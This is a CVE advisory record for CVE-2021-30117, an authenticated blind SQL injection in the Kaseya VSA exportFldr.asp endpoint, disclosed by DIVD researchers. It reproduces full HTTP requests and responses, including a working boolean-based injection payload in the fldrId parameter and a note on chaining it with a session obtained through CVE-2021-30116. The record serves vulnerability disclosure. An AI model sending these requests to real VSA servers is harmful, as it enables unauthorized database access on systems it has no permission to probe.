{"CVE_data_meta":{"ASSIGNER":"cve@mitre.org","ID":"CVE-2021-30117","STATE":"PUBLIC","TITLE":"Authenticated SQL injection in Kaseya VSA < v9.5.6"},"affects":{"vendor":{"vendor_data":[{"product":{"product_data":[{"product_name":"Kaseya VSA (on premise and SaaS)","version":{"version_data":[{"version_affected":"<","version_name":"9.x","version_value":"9.5.6"}]}},{"product_name":"Kaseya VSA Agent","version":{"version_data":[{"version_affected":"<","version_name":"9.x","version_value":"9.5.0.23"}]}}]},"vendor_name":"Kaseya"}]}},"credit":[{"lang":"eng","value":"Discovered by Wietse Boonstra of DIVD"},{"lang":"eng","value":"Additional research by Frank Breedijk of DIVD"}],"data_format":"MITRE","data_type":"CVE","data_version":"4.0","description":{"description_data":[{"lang":"eng","value":"The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116.\nThe result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n\n\n \n\n \tWhoops.\n \n \n \n\t\n \n----SNIP----\n```\n\nHowever when fldrId is set to ‘(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))’ the request is allowed.\n\nRequest:\n```\nGET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 17:33:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 7960\n \n \n\n\nExport Folder\n